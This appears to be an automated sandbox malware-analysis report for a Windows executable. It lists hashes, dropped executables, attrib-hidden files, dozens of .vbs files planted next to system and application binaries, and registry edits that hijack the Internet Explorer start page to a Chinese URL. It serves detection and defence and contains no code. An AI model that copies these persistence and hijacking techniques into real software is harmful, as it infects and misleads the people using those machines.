81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e

Analysis

max time kernel
113s
max time network
149s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
19/09/2022, 05:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
Size

498KB
MD5

bf7a015db3f886fa52cb9bb317b05872
SHA1

a2e40225fb1be410c640269df6099d5bff1598b5
SHA256

81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e
SHA512

cc718273de3c9124a1585d6d495db64d6d503101178b1665a4898a9a5b8a1111fd45cf216b0a12a1af970ef6707dcb413e60359ad54c726f90fa92b623a5480e
SSDEEP

6144:I6rCnplOxq8VxTfFDbRnOTrt5JGXfEdyCwaeVEuClROTfFDbRnOTrt5JOTfFDbRW:IVbG5OcqyCwrVEum+5Oi5OV

Score

8^/10

evasion

Malware Config

Signatures

Executes dropped EXE 5 IoCs

pid	Process
1584	adminlog.exe
1400	syslog.exe
1092	setup.exe.exe
296	youbei.exe.exe
1592	f42r.exe

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
1324	attrib.exe
1316	attrib.exe
452	attrib.exe
1920	attrib.exe

Loads dropped DLL 6 IoCs

pid	Process
1516	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
872	wscript.exe
872	wscript.exe
1400	syslog.exe
1400	syslog.exe
296	youbei.exe.exe

Drops file in System32 directory 46 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\msconfig.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\WFS.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\displayswitch.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\mstsc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\mstsc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\iscsicpl.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\notepad.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\calc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\mblctr.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\NetProj.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\SnippingTool.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\recdisc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\control.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\StikyNot.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\StikyNot.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\rundll32.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\MdSched.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\WINDOWS\SysWOW64\WINDOW~1\v1.0\powershell.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\xpsrchvw.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\mspaint.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\odbcad32.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\control.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\msra.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\msra.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\cmd.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\mblctr.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\mobsync.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\iscsicpl.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\WINDOWS\SysWOW64\WINDOW~1\v1.0\powershell.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\recdisc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\WFS.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\calc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\NetProj.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\SoundRecorder.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\mobsync.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\mspaint.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\SoundRecorder.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\rundll32.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\MdSched.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\cmd.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\notepad.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\xpsrchvw.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\displayswitch.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\SnippingTool.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\SysWOW64\odbcad32.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\SysWOW64\msconfig.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.cmd	adminlog.exe
File created	C:\PROGRA~2\WI4223~1\sidebar.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files (x86)\Common Files\360Safe.exe	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Program Files (x86)\Common Files\360Safe.exe	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files\Kingsoft\myfile\tools.lnk	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\360.cmd	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\软件下载.url	adminlog.exe
File created	C:\PROGRA~1\VideoLAN\VLC\vlc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\PROGRA~2\WI4223~1\sidebar.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\starts.vbs	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\se.vbs	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	attrib.exe
File opened for modification	C:\Program Files\Windows NT\se.vbs	cmd.exe
File created	C:\Program Files\Kingsoft\myfile\open.vbs	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.lnk	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.lnk	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tool.cmd	attrib.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\starts.vbs	attrib.exe
File created	C:\Program Files\Windows NT\se.vbs	cmd.exe
File created	C:\Program Files (x86)\Java\jre7\bin\javacpl.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files (x86)\Common Files\Microsoft\jmc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tool.cmd	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\tao2.ico	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\open.vbs	attrib.exe
File created	C:\Program Files\winrar\tao2.ico	cmd.exe
File created	C:\Program Files\Kingsoft\myfile\tool.cmd	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tools.lnk	adminlog.exe
File opened for modification	C:\Program Files\winrar\tao2.ico	cmd.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft\jmc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files (x86)\C5FEE.exe	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\360.cmd	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\fav\软件下载.url	adminlog.exe
File opened for modification	C:\PROGRA~1\VideoLAN\VLC\vlc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files\Kingsoft\myfile\__tmp_rar_sfx_access_check_7090807	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\file.vbs	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\se1.vbs	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.cmd	adminlog.exe
File created	C:\PROGRA~1\MOZILL~1\firefox.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft\chrome.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	adminlog.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	adminlog.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\PROGRA~2\WI54FB~1\wmplayer.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmplayer.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\Ink\mip.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	adminlog.exe
File created	C:\Program Files (x86)\DVD Maker\DVDMaker.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Program Files (x86)\C5FEE.exe	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.vbs	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\fav\tao2.ico	adminlog.exe
File created	C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url	adminlog.exe
File created	C:\Program Files (x86)\Common Files\Microsoft\DVDMaker.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files (x86)\Common Files\Microsoft\javacpl.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\PROGRA~1\7-Zip\7zFM.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Program Files (x86)\Java\jdk1.7.0_80\bin\jmc.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe

Drops file in Windows directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ehome\ehshell.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\xlicons.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\outicon.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\pubs.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\explorer.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\ehome\ehshell.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\accicons.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\joticon.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\outicon.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\pptico.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\pptico.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\pubs.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\grvicons.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\joticon.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\wordicon.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\wordicon.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\grvicons.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\accicons.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\xlicons.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe
File created	C:\Windows\explorer.exe.vbs	81831bb50cf92c9bfdc6b089102f89f5c95229a1f7eb2c064af750abe0b87e8e.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{36BD5771-37EB-11ED-8DFC-667719A561AF} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000b425351e57cc83427453347a612c961a9ed0803d33a5f7394cf14bce6dbe3432000000000e8000000002000020000000ea30f6241cc593bd24e91839a5fe912861ed04ee4c0993c9c00cf54c6f8facaf200000007dc034526d1adbd7198f3bc843a5353af0bd0424f52ba8de6eaef9978371c86b40000000a46456bd35bccc0df9f1c4292ee8ffcafbc20977ec481c3311d61d116b352648809dd57d204274ee453a0da9b09b914341f8b327f970053f0940de376293ddf4	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Default_Page_URL = "http://www.9281.net/?cmd"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000be547f3fbb8c01552437b31186ac4049bc8f47c205c43656d6efaaabc843e9cb000000000e8000000002000020000000a5541b1e7e4bddb4435c26976cbf033f4ae8c0b45b83067029364bee31369def90000000861063ac84adef9bcf45753b799153705363ea91964aaa30ce945b3fc200dbaca633a4567b57c5c3a3504b2445b82972682b9e46a553f45140fa2e7927be10678a2f89a417e487510b4860b6187b9419bd78a85db0a86529062dd7095e5989f06a319c60228ce61295f7cd296a7d7ff35aa4eaddd67f0377564398e64d8886b9d04750b3ee762cae13049fa3e57cc0b740000000384509e6d5da0c306d008646ebbd7e23d31b73d34f4a16a75d3eafd8899e107c548d0426e782f871f07d9c6d434b8e7aa4d6278aff1eb32ff4730e64ed834b5d	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370336865"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 502c861df8cbd801	iexplore.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.9281.net/?cmd"	reg.exe

Modifies registry class 44 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\shell\╩⌠╨╘(&R)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DCCCC}	reg.exe
